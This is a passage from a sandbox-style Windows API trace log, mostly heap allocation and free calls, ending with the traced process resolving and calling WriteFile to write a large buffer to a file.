lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0176.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0176.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0176.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0176.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0176.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0176.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0176.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0176.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0176.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0176.406] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0176.406] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0176.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0176.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0176.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0176.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0176.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0176.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0176.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0176.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0176.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0176.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0176.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0176.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0176.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0176.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0176.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0176.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0176.408] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0176.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0176.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0176.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0176.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0176.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0176.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0176.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0176.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0176.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0176.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0176.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0176.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0176.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0176.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0176.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0176.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0176.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0176.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0176.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0176.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0176.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0176.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0176.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.412] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd960 [0176.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd960, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0176.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0176.413] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0176.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0176.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0176.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0176.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0176.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0176.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0176.413] WriteFile (in: hFile=0x138, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x42400, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x42400, lpOverlapped=0x0) returned 1 [0176.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) 